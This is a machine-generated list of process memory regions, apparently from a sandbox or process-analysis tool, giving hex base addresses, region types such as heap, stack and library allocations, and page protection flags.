trusted library allocation
page read and write
1AA41EB4000
heap
page read and write
992000
stack
page read and write
1F9E0CC8000
heap
page read and write
1F9E0416000
heap
page read and write
1F9E0885000
heap
page read and write
22FB000
heap
page read and write
1F9E0D30000
heap
page read and write
1C138000
trusted library allocation
page read and write
1C470000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1BDC6213000
trusted library allocation
page read and write
1C430000
trusted library allocation
page read and write
1AEB4000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9E0453000
heap
page read and write
1C090000
trusted library allocation
page read and write
1BFE0000
trusted library allocation
page read and write
BF14CFE000
stack
page read and write
240220A5000
heap
page read and write
1F9E0E8A000
heap
page read and write
1BD30000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1BD70000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B670000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CB0000
heap
page read and write
2403A7E1000
heap
page read and write
1BDC6106000
trusted library allocation
page read and write
1B7FB000
heap
page read and write
1F9E0E8A000
heap
page read and write
7FFB4B2F6000
trusted library allocation
page read and write
1B5EA000
heap
page read and write
1BDC0000
trusted library allocation
page read and write
1F9E0CF8000
heap
page read and write
1F9E0E8A000
heap
page read and write
1B4BE000
heap
page read and write
1F3DC7C1000
trusted library allocation
page read and write
7FFB4B6A0000
trusted library allocation
page read and write
7FFB4B640000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1B370000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F9E0CB8000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
170000
heap
page read and write
1B570000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
2A4ACB99000
unkown
page read and write
1B6E3000
trusted library allocation
page read and write
1AF79000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
231A88F5000
heap
page read and write
1BD90000
trusted library allocation
page read and write
872B8B8000
stack
page read and write
1C4C3000
trusted library allocation
page read and write
7FFB4B4D0000
trusted library allocation
page read and write
1F3F5223000
heap
page read and write
7FFB4B5AC000
trusted library allocation
page read and write
90000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CD0000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0D10000
heap
page read and write
1B510000
heap
page read and write
1B520000
trusted library allocation
page read and write
1F9E0D18000
heap
page read and write
1AA3FF20000
direct allocation
page execute and read and write
1F9E0E8A000
heap
page read and write
1BDFF000
trusted library allocation
page read and write
1F9E0E8B000
heap
page read and write
1F9E0D10000
heap
page read and write
1F9E0CC8000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
5800000
trusted library allocation
page read and write
1BDC4AEA000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
2A4ACD90000
heap
page read and write
7FFB4B4F0000
trusted library allocation
page read and write
1F9DF9D0000
trusted library allocation
page read and write
1F3F4F14000
heap
page read and write
1B740000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E0CC8000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F3DAB60000
heap
page read and write
7FFB4B560000
trusted library allocation
page read and write
1AA4199A000
heap
page read and write
1B3DC000
heap
page execute and read and write
872C68A000
stack
page read and write
1C1C0000
trusted library allocation
page read and write
240206D2000
heap
page read and write
7FFB4B6D0000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F9E0CD0000
heap
page read and write
BF089FF000
stack
page read and write
1BE50000
trusted library allocation
page read and write
1B350000
trusted library allocation
page read and write
1C2E0000
trusted library allocation
page read and write
DC5000
heap
page read and write
24D916AA000
heap
page read and write
2E26000
trusted library allocation
page read and write
1C1D0000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
5433000
heap
page read and write
1AA3FFA8000
heap
page read and write
1B310000
trusted library allocation
page read and write
BF088FE000
stack
page read and write
1B496000
heap
page read and write
2A4ACDBF000
heap
page read and write
7FFB4B6D0000
trusted library allocation
page read and write
7FFB4B294000
trusted library allocation
page read and write
1BDE0000
trusted library allocation
page read and write
7DF43B4E0000
unkown
page read and write
1F9E0D00000
heap
page read and write
1F9E0CB8000
heap
page read and write
1C430000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
7FF63D3FF000
unkown
page readonly
1B6E3000
trusted library allocation
page read and write
53A9000
heap
page read and write
2402348A000
trusted library allocation
page read and write
1F9E06CD000
heap
page read and write
401000
unkown
page execute read
1F9E0CC8000
heap
page read and write
1AA3FDAC000
unkown
page read and write
1BDAD000
trusted library allocation
page read and write
1F9E0CB0000
heap
page read and write
1BE60000
trusted library allocation
page read and write
2403A6F0000
heap
page read and write
1AF45000
heap
page read and write
872BA3E000
stack
page read and write
1C410000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
22130821000
heap
page read and write
2B78000
trusted library allocation
page read and write
BF0944E000
stack
page read and write
53BD000
heap
page read and write
7FF63D3FF000
unkown
page readonly
1C000000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1BDC2DDD000
heap
page read and write
7FFB4B4B0000
trusted library allocation
page read and write
DD7000
heap
page read and write
735000
unkown
page read and write
1C2F0000
trusted library allocation
page read and write
2EC2000
trusted library allocation
page read and write
7DF4AA0E0000
trusted library allocation
page execute and read and write
38CF000
stack
page read and write
1F9E0CC8000
heap
page read and write
1F9E042A000
heap
page read and write
1260000
heap
page read and write
1C520000
trusted library allocation
page read and write
7FFB4B500000
trusted library allocation
page read and write
C74000
heap
page read and write
1BEA0000
trusted library allocation
page read and write
24023003000
trusted library allocation
page read and write
2775000
heap
page read and write
1F9E0CA0000
heap
page read and write
1F3F4EE1000
heap
page read and write
1F9E0CB8000
heap
page read and write
1AA3FF4F000
unkown
page read and write
7FFB4B283000
trusted library allocation
page execute and read and write
1BE90000
trusted library allocation
page read and write
1C420000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
7FFB4B410000
trusted library allocation
page execute and read and write
1F9E0CA0000
heap
page read and write
872B47E000
stack
page read and write
231A8750000
heap
page read and write
1BF5F000
stack
page read and write
1B750000
trusted library allocation
page read and write
1BE51000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1BE53000
trusted library allocation
page read and write
1C4C0000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
24AA000
heap
page read and write
1BF90000
trusted library allocation
page read and write
1F3DE296000
trusted library allocation
page read and write
1F3DE267000
trusted library allocation
page read and write
7FFB4B510000
trusted library allocation
page read and write
1F9E0CF8000
heap
page read and write
1F9DF9D0000
direct allocation
page execute and read and write
897000
unkown
page read and write
1B6E0000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
7FFB4B300000
trusted library allocation
page execute and read and write
1C01E000
stack
page read and write
BF084FE000
stack
page read and write
1F9E0E8A000
heap
page read and write
231A8870000
heap
page read and write
7FFBAA47F000
unkown
page read and write
1F9E0CC8000
heap
page read and write
2403AA03000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CB8000
heap
page read and write
1BF10000
trusted library allocation
page read and write
1F3F4B00000
heap
page read and write
89D000
unkown
page write copy
1F9E0D28000
heap
page read and write
E8E000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1C410000
trusted library allocation
page read and write
1F9E0D40000
heap
page read and write
1C3C0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0D60000
heap
page read and write
1F9E0E8A000
heap
page read and write
2401000
heap
page read and write
1C406000
trusted library allocation
page read and write
1BE70000
trusted library allocation
page read and write
1C450000
trusted library allocation
page read and write
1F9E0E8D000
heap
page read and write
7FFB4B550000
trusted library allocation
page read and write
1BE53000
trusted library allocation
page read and write
24023D0A000
trusted library allocation
page read and write
240240E1000
trusted library allocation
page read and write
1C1AE000
stack
page read and write
1F9E0D10000
heap
page read and write
1F9E0CE0000
heap
page read and write
CF8000
heap
page read and write
7DF424640000
trusted library allocation
page execute and read and write
1F9E0CB8000
heap
page read and write
24022030000
trusted library allocation
page read and write
7FFB4B427000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
1F9E0CD0000
heap
page read and write
1C0A0000
trusted library allocation
page read and write
778000
heap
page read and write
1F9E0470000
unkown
page read and write
1F9E0CB0000
heap
page read and write
1C4A0000
trusted library allocation
page read and write
1F9E05E4000
unkown
page read and write
1F9E0CB0000
heap
page read and write
1F9E0D18000
heap
page read and write
1B040000
trusted library section
page read and write
2E16000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1F3F4F6E000
heap
page read and write
7FFB4B260000
trusted library allocation
page read and write
1F3DC5CD000
heap
page read and write
D82000
heap
page read and write
7FF63D221000
unkown
page execute read
1AA3FFD3000
heap
page read and write
1BE60000
trusted library allocation
page read and write
24020782000
heap
page read and write
BF08479000
stack
page read and write
1F3DACD0000
trusted library section
page read and write
D4D000
heap
page read and write
1F9E0E8A000
heap
page read and write
7FFB4B5D8000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1AA3FF10000
trusted library allocation
page read and write
1F3F4F10000
heap
page read and write
1F3ECAC5000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
7FFB4B29C000
trusted library allocation
page execute and read and write
1F9E0CC8000
heap
page read and write
1F9E01F7000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
2A4ACBAF000
unkown
page execute and read and write
1F9E0CF8000
heap
page read and write
1F3F4F46000
heap
page read and write
2553000
heap
page read and write
1BE20000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
7FFB4B31C000
trusted library allocation
page execute and read and write
155E000
stack
page read and write
7FFB4B421000
trusted library allocation
page read and write
1F9E0470000
unkown
page read and write
1BEB0000
trusted library allocation
page read and write
1F9DE087000
heap
page read and write
1F9E0E8A000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
2B6F000
stack
page read and write
1B6E0000
trusted library allocation
page read and write
2770000
heap
page read and write
1C556000
trusted library allocation
page read and write
1F9E03B2000
heap
page read and write
1F9E0E8A000
heap
page read and write
1BDC2DBD000
heap
page read and write
1BFE0000
trusted library allocation
page read and write
28CC000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1B320000
trusted library allocation
page read and write
1B190000
trusted library allocation
page read and write
1F9E0D48000
heap
page read and write
1AA3FFEC000
heap
page read and write
1F9E0D30000
heap
page read and write
1BE50000
trusted library allocation
page read and write
7FFB4B6B0000
trusted library allocation
page read and write
24032593000
trusted library allocation
page read and write
7FFB4B273000
trusted library allocation
page execute and read and write
1B5C6000
heap
page read and write
2212EE40000
heap
page read and write
1C178000
unkown
page read and write
2B88000
trusted library allocation
page read and write
1F3DAD54000
heap
page read and write
1BE60000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E044B000
heap
page read and write
1F3DC9E9000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1B303000
trusted library allocation
page read and write
895000
unkown
page readonly
1C1C0000
trusted library allocation
page read and write
4DE0000
heap
page read and write
1B310000
trusted library allocation
page read and write
7FFB4B5A0000
trusted library allocation
page read and write
2402070B000
heap
page read and write
1F9E0CE0000
heap
page read and write
1B300000
trusted library allocation
page read and write
2403A9B0000
heap
page read and write
7FFB4B670000
trusted library allocation
page read and write
2212EE20000
heap
page read and write
1AA3FD99000
unkown
page read and write
1F9E0CE8000
heap
page read and write
1F9E0750000
unkown
page read and write
1F9E0CE0000
heap
page read and write
1F9E0CB0000
heap
page read and write
1B580000
trusted library allocation
page read and write
1F9E043B000
heap
page read and write
53BB000
heap
page read and write
897000
unkown
page write copy
1F9E0530000
unkown
page read and write
1F9E01B4000
heap
page read and write
7FFB4B422000
trusted library allocation
page read and write
7FFB4B243000
trusted library allocation
page execute and read and write
750000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
54E0000
heap
page read and write
1C400000
trusted library allocation
page read and write
28E0000
trusted library allocation
page read and write
7FFB4B470000
trusted library allocation
page read and write
1BE00000
trusted library allocation
page read and write
1BE10000
trusted library allocation
page read and write
1F3DABA0000
heap
page read and write
24024136000
trusted library allocation
page read and write
1F9E0D18000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
C14000
heap
page read and write
1BDC46D0000
heap
page readonly
28D0000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
12901000
trusted library allocation
page read and write
10B0000
heap
page read and write
7FFB4B470000
trusted library allocation
page read and write
CD0000
heap
page read and write
24020747000
heap
page read and write
2403AB80000
heap
page read and write
1BD50000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
7FFB4B250000
trusted library allocation
page read and write
DCD000
heap
page read and write
1F3F4CA0000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1F9E0CD0000
heap
page read and write
2A4ACD60000
heap
page readonly
2402074D000
heap
page read and write
1B6DE000
stack
page read and write
291C000
trusted library allocation
page read and write
22130924000
heap
page read and write
1F9E0202000
heap
page read and write
1B5C7000
heap
page read and write
BF0857A000
stack
page read and write
1B6E3000
trusted library allocation
page read and write
1B3C0000
trusted library allocation
page read and write
15DF000
stack
page read and write
1F9E0CC8000
heap
page read and write
7FFB4B400000
trusted library allocation
page execute and read and write
28F0000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9E0D28000
heap
page read and write
2760000
trusted library section
page read and write
1F9E0E8A000
heap
page read and write
1F9E0D28000
heap
page read and write
1F9E0E8A000
heap
page read and write
DCF000
heap
page read and write
1070000
heap
page read and write
1F9E01FE000
heap
page read and write
7FFB4B6C0000
trusted library allocation
page read and write
53A5000
heap
page read and write
DC1000
heap
page read and write
7FFB4B242000
trusted library allocation
page read and write
67FC000
stack
page read and write
ECA000
heap
page read and write
1F9E0CB8000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CD0000
heap
page read and write
1AA3FFE2000
heap
page read and write
1BDC4900000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F9E042A000
heap
page read and write
1BE80000
trusted library allocation
page read and write
1B6F0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
2403AA16000
heap
page read and write
1AB10000
trusted library allocation
page read and write
2132000
heap
page read and write
2720000
heap
page execute and read and write
1B6E0000
trusted library allocation
page read and write
1BE53000
trusted library allocation
page read and write
1BDC46A0000
trusted library allocation
page read and write
1C2B0000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
29A3000
trusted library allocation
page read and write
53AC000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1F3DAD10000
heap
page readonly
1B819000
heap
page read and write
1F9E0D28000
heap
page read and write
1F9E0CF8000
heap
page read and write
7FFB4B400000
trusted library allocation
page read and write
1B3C0000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
1BDDD021000
heap
page read and write
2A4AE7B0000
heap
page read and write
1B313000
trusted library allocation
page read and write
2403AE45000
heap
page read and write
1F9E0D28000
heap
page read and write
1BDDCE2C000
heap
page read and write
2212EE83000
heap
page read and write
730000
heap
page read and write
24032585000
trusted library allocation
page read and write
BF087FB000
stack
page read and write
1BF60000
trusted library allocation
page read and write
2E1F000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
1F9E0453000
heap
page read and write
1F9E0E8A000
heap
page read and write
240322B0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F3DAB40000
heap
page read and write
1F9E0CC8000
heap
page read and write
1F9E0D58000
heap
page read and write
1F9E0CB0000
heap
page read and write
1B580000
trusted library allocation
page read and write
2740000
trusted library allocation
page read and write
1F9DE0BC000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0C91000
heap
page read and write
1B5D9000
heap
page read and write
7FFB4B290000
trusted library allocation
page read and write
1B330000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1BDC5692000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
7DF43B4E4000
unkown
page read and write
7DF43B4E6000
unkown
page read and write
190000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B440000
trusted library allocation
page read and write
1BE70000
trusted library allocation
page read and write
2403A74D000
heap
page read and write
2403AE49000
heap
page read and write
1B4B5000
trusted library allocation
page read and write
1F9E0CC5000
heap
page read and write
7FFB4B280000
trusted library allocation
page read and write
5448000
heap
page read and write
1F9E0CE0000
heap
page read and write
2403A2A1000
heap
page read and write
1C360000
trusted library allocation
page read and write
1AA3FFCB000
heap
page read and write
1F9E0CB8000
heap
page read and write
7FFB4B33C000
trusted library allocation
page execute and read and write
1F9E06C0000
heap
page read and write
7FFB4B460000
trusted library allocation
page read and write
1B170000
trusted library allocation
page read and write
1BDC4713000
trusted library allocation
page read and write
1BD50000
trusted library allocation
page read and write
1B660000
trusted library allocation
page read and write
1AA401C6000
heap
page read and write
1AA41F7E000
heap
page read and write
7FFB4B4A0000
trusted library allocation
page read and write
7FFB4B422000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B660000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
895000
unkown
page readonly
1F9E0D10000
heap
page read and write
1B300000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1AA41980000
heap
page read and write
2B8A000
trusted library allocation
page read and write
1F9E0D78000
heap
page read and write
1F9E045E000
heap
page read and write
7FFB4B570000
trusted library allocation
page read and write
1BE90000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0356000
heap
page read and write
1C0BB000
unkown
page read and write
1BE60000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1BE60000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
6D0000
heap
page read and write
3C038F7000
stack
page read and write
1AF75000
heap
page read and write
3C034FE000
stack
page read and write
1F9E0428000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
24D916A0000
heap
page read and write
B78000
stack
page read and write
7FFB4B4A0000
trusted library allocation
page read and write
1B300000
trusted library allocation
page read and write
DEB000
heap
page read and write
8AD000
unkown
page readonly
1B6E3000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B490000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
7FFB4B28B000
trusted library allocation
page execute and read and write
2E55000
trusted library allocation
page read and write
1BDC687C000
trusted library allocation
page read and write
7FFB4B27D000
trusted library allocation
page execute and read and write
1B6C0000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1F9E0D00000
heap
page read and write
1BE90000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1AA41F7E000
heap
page read and write
1B310000
trusted library allocation
page read and write
7FFB4B560000
trusted library allocation
page read and write
7FFB4B26D000
trusted library allocation
page execute and read and write
1B461000
heap
page read and write
1B303000
trusted library allocation
page read and write
1BE53000
trusted library allocation
page read and write
1BDDD019000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CA0000
heap
page read and write
1F9E0E8A000
heap
page read and write
1B67F000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
1F9E0CE8000
heap
page read and write
1F3EC7C1000
trusted library allocation
page read and write
1AA41EB3000
heap
page read and write
1F9E0CE8000
heap
page read and write
7FF7F0929000
direct allocation
page execute and read and write
1B6E0000
trusted library allocation
page read and write
1F9E0CC6000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0D18000
heap
page read and write
22130923000
heap
page read and write
7FFB4B530000
trusted library allocation
page read and write
7FFB4B2A0000
trusted library allocation
page read and write
1F9E0D10000
heap
page read and write
1B300000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E0E8A000
heap
page read and write
54D1000
heap
page read and write
96C44FD000
stack
page read and write
7FFB4B594000
trusted library allocation
page read and write
7FFB4B4B0000
trusted library allocation
page read and write
1B310000
remote allocation
page read and write
1B54C000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1BF00000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
BF149CD000
stack
page read and write
7FFB4B3A0000
trusted library allocation
page execute and read and write
1BE50000
trusted library allocation
page read and write
1BF70000
trusted library allocation
page read and write
1F3DD1BB000
trusted library allocation
page read and write
1F3F4D80000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9E0888000
heap
page read and write
7FFB4B346000
trusted library allocation
page execute and read and write
DEB000
heap
page read and write
1F9E0CB8000
heap
page read and write
1BE50000
trusted library allocation
page read and write
7FFB4B4A0000
trusted library allocation
page read and write
1AA4199A000
heap
page read and write
1F9E0D30000
heap
page read and write
1F9E0D48000
heap
page read and write
1BDC47FC000
heap
page read and write
979000
unkown
page readonly
21F1000
heap
page read and write
7FFB4B243000
trusted library allocation
page execute and read and write
7DF43B4E1000
unkown
page execute read
1B6E0000
trusted library allocation
page read and write
1C330000
trusted library allocation
page read and write
12A0000
heap
page read and write
1F9E0D10000
heap
page read and write
1F9E0CB0000
heap
page read and write
1B3B0000
trusted library allocation
page read and write
1F9E02FF000
heap
page read and write
1BE60000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
2EB0000
trusted library allocation
page read and write
2212EE70000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1C0F0000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
1F3F4B5F000
heap
page read and write
2A4AD005000
heap
page read and write
1F9E034D000
heap
page read and write
1C3A3000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1B6F0000
trusted library allocation
page read and write
2212F070000
heap
page read and write
8A9000
unkown
page readonly
1C4A0000
trusted library allocation
page read and write
3C03BFB000
stack
page read and write
1F9E0E8A000
heap
page read and write
3C037F8000
stack
page read and write
BF0897C000
stack
page read and write
1B660000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
28C0000
direct allocation
page execute and read and write
1F9E0CE8000
heap
page read and write
1BDC4A50000
heap
page execute and read and write
28B0000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
7FF63D2DC000
unkown
page readonly
24032589000
trusted library allocation
page read and write
2E13000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1F9E01F7000
heap
page read and write
1BE63000
trusted library allocation
page read and write
1AA3FFEC000
heap
page read and write
1F9E0D18000
heap
page read and write
1F9E0D48000
heap
page read and write
1F9E0CB8000
heap
page read and write
1F9E0D30000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
1F9E07C6000
unkown
page read and write
1B6E3000
trusted library allocation
page read and write
7FFB4B280000
trusted library allocation
page read and write
1F9E0415000
heap
page read and write
2A4ACCB0000
heap
page read and write
7FFB4B490000
trusted library allocation
page read and write
872B1FE000
stack
page read and write
1F9E0CC8000
heap
page read and write
1BFF0000
trusted library allocation
page read and write
1F3DAD60000
trusted library allocation
page read and write
7FFB4B3FA000
trusted library allocation
page read and write
1BE70000
trusted library allocation
page read and write
1F3DACE0000
trusted library allocation
page read and write
2403ABA9000
heap
page read and write
7FFB4B4E0000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
7FFB4B450000
trusted library allocation
page read and write
1AA3FFEC000
heap
page read and write
28C3000
trusted library allocation
page read and write
1F9DDF20000
unkown
page execute and read and write
1BDC67FC000
trusted library allocation
page read and write
7FFB4B6B0000
trusted library allocation
page read and write
1BDC0000
trusted library allocation
page read and write
DEB000
heap
page read and write
1C370000
trusted library allocation
page read and write
2E5D000
trusted library allocation
page read and write
7FFB4B4D0000
trusted library allocation
page read and write
1C560000
trusted library allocation
page read and write
1C549000
trusted library allocation
page read and write
6A7000
unkown
page readonly
1F3EC7E1000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
31EF000
stack
page read and write
7DF43B4EA000
unkown
page read and write
1F9E0D00000
heap
page read and write
7FF7F03B0000
direct allocation
page execute and read and write
1F9E0CD0000
heap
page read and write
1B3C0000
trusted library allocation
page read and write
1C5A0000
trusted library allocation
page read and write
1BDC6255000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
24020707000
heap
page read and write
1F9E0D40000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9E05E8000
unkown
page read and write
1BE50000
trusted library allocation
page read and write
1F9E042D000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F3DABC0000
heap
page read and write
12EB000
heap
page read and write
3D0000
heap
page read and write
1F3F4BED000
heap
page read and write
2950000
heap
page read and write
1F9E0CE0000
heap
page read and write
1F9E0CD0000
heap
page read and write
1C2AD000
stack
page read and write
401000
unkown
page execute read
1F3F4B4C000
heap
page read and write
1BDC69EE000
trusted library allocation
page read and write
7FFB4B510000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1BDDCE58000
heap
page read and write
1B3B0000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
1F9E0D18000
heap
page read and write
7FFB4B430000
trusted library allocation
page execute and read and write
1BE60000
trusted library allocation
page read and write
1F3DE5F8000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1B5B7000
heap
page read and write
1BE50000
trusted library allocation
page read and write
7FFB4B290000
trusted library allocation
page read and write
1B5C4000
heap
page read and write
1B430000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1BDDCFF8000
heap
page read and write
1B380000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
7FFB4B390000
trusted library allocation
page execute and read and write
1AA41979000
heap
page read and write
7FFB4B244000
trusted library allocation
page read and write
1F9E0D30000
heap
page read and write
1F9E0E8A000
heap
page read and write
1C3D0000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
5300000
heap
page read and write
2B00000
heap
page execute and read and write
1C500000
trusted library allocation
page read and write
1F3F51F0000
heap
page read and write
1AA41F50000
heap
page read and write
1C300000
trusted library allocation
page read and write
1BEC0000
trusted library allocation
page read and write
231A8830000
heap
page read and write
7FFB4B27D000
trusted library allocation
page execute and read and write
1C070000
trusted library allocation
page read and write
1C390000
trusted library allocation
page read and write
1F3DD34F000
trusted library allocation
page read and write
1F9E0CE0000
heap
page read and write
7FFB4B530000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
7FFB4B340000
trusted library allocation
page execute and read and write
1F9E0CB8000
heap
page read and write
1BFC0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1BDC61FA000
trusted library allocation
page read and write
7FFB4B310000
trusted library allocation
page read and write
28E0000
direct allocation
page read and write
1F9E0E8A000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
7FFB4B26D000
trusted library allocation
page execute and read and write
1B6E3000
trusted library allocation
page read and write
1C4E0000
trusted library allocation
page read and write
22130C3C000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
24023C11000
trusted library allocation
page read and write
3C0347E000
stack
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E7000
trusted library allocation
page read and write
7FFB4B540000
trusted library allocation
page read and write
1BDDCE4D000
heap
page read and write
1F9E0CE8000
heap
page read and write
1B81C000
heap
page read and write
1F9E0CD0000
heap
page read and write
7FF63D3FB000
unkown
page read and write
1B300000
trusted library allocation
page read and write
1F9E01F7000
heap
page read and write
1C2E0000
trusted library allocation
page read and write
2403A743000
heap
page read and write
1F3F4CB3000
heap
page read and write
1C2C0000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
1B300000
trusted library allocation
page read and write
1C200000
trusted library allocation
page read and write
1B420000
heap
page read and write
2750000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
7FFB4B24D000
trusted library allocation
page execute and read and write
D09000
heap
page read and write
1F9E0D48000
heap
page read and write
1F9E042B000
heap
page read and write
BF0887E000
stack
page read and write
7FFB4B690000
trusted library allocation
page read and write
1BDDCE2F000
heap
page read and write
1F3DD5E2000
trusted library allocation
page read and write
BF14C7E000
stack
page read and write
24023258000
trusted library allocation
page read and write
7FFB4B5C0000
trusted library allocation
page read and write
1C09A000
stack
page read and write
1F3F4B56000
heap
page read and write
2780000
heap
page execute and read and write
1F9DF9D0000
trusted library allocation
page read and write
1BD40000
trusted library allocation
page read and write
DEB000
heap
page read and write
7FFB4B5A0000
trusted library allocation
page read and write
1C0A0000
trusted library allocation
page read and write
7FFB4B3E0000
trusted library allocation
page read and write
1B300000
trusted library allocation
page read and write
24023D80000
trusted library allocation
page read and write
1B81D000
heap
page read and write
1AA3FFA0000
heap
page read and write
1AA41FBF000
heap
page read and write
7FFB4B330000
trusted library allocation
page read and write
1C330000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
24D916AE000
heap
page read and write
1BDDCDA0000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0D28000
heap
page read and write
1F3F4B69000
heap
page read and write
813000
heap
page read and write
872BABF000
stack
page read and write
7FFB4B5A2000
trusted library allocation
page read and write
